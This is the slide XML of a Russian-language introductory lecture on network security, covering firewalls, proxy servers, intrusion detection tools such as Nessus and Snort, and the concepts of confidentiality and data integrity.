              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>заголовок (номера портов)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>флаги </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (например, запрет установления соединения)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Работают по правилам, к примеру</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="669999"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>запретить все входящие соединения, кроме как на 80 порт</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6"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Прокси-серверы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Все запросы браузеры направляют прокси-серверу</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Тот ищет страничку в кэше и, если не находит, посылает запрос к удаленному веб-серверу</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Клиенты не подключаются к Интернету напрямую</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Прокси-сервер может фильтровать трафик (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>vkontakte.ru</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</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8"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Системы обнаружения уязвимостей и вторжений</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1500120"/>
            <a:ext cx="8227440" cy="4998600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Находят уязвимости компьютеров в сети</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проверяют конфигурацию системы на устойчивость к известным атакам</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проверяют сетевые настройки ОС</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проводят мониторинг ОС на предмет обнаружения признаков взлома</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Примеры: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Snort,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>GFI LANguard</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240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2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Проблема: каждое сообщение об угрозе требует анализа человеком</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="510" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143840" y="3643200"/>
            <a:ext cx="2121840" cy="117900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4"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Конфиденциальность</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8456040" cy="4874760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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u="sng">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Конфиденциальность</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> – только отправитель и получатель должны знать содержимое сообщения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Text Box 3"/>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A037B89F-EE11-42DA-AA05-743FD9D6703D}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="AutoShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3049560" y="4510080"/>
            <a:ext cx="2664720" cy="1521720"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6787"/>
              <a:gd name="adj2" fmla="val 14898"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cccc00"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>сеть</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571760" y="4662360"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="299" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524640" y="4662360"/>
            <a:ext cx="713880" cy="988560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439720" y="5271840"/>
            <a:ext cx="3733920" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
            <a:headEnd len="lg" type="stealth" w="lg"/>
            <a:tailEnd len="lg" type="stealth" w="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="301" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4187880" y="3214800"/>
            <a:ext cx="688320" cy="950400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3201840" y="4281480"/>
            <a:ext cx="988560" cy="988560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 988560"/>
              <a:gd name="textAreaRight" fmla="*/ 990720 w 988560"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 988560"/>
              <a:gd name="textAreaBottom" fmla="*/ 990720 h 988560"/>
            </a:gdLst>
            <a:ahLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="624" h="624">
                <a:moveTo>
                  <a:pt x="0" y="624"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66" y="601"/>
                  <a:pt x="293" y="587"/>
                  <a:pt x="397" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="501" y="379"/>
                  <a:pt x="577" y="101"/>
                  <a:pt x="624" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="sq" w="28440">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:tailEnd len="lg" type="stealth" w="lg"/>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303" name="Text Box 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963320" y="3290760"/>
            <a:ext cx="2305800" cy="825480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Подслушивание</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>перехват пакетов</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="8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ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>копирование</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4"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Целостность данных</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8456040" cy="4874760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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u="sng">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Целостность данных </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– злоумышленник не должен иметь возможность изменить передаваемые данные</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Text Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="629604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en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:fld id="{80FE1575-2AD2-49FA-9FB5-045F9433C4A7}" type="slidenum">
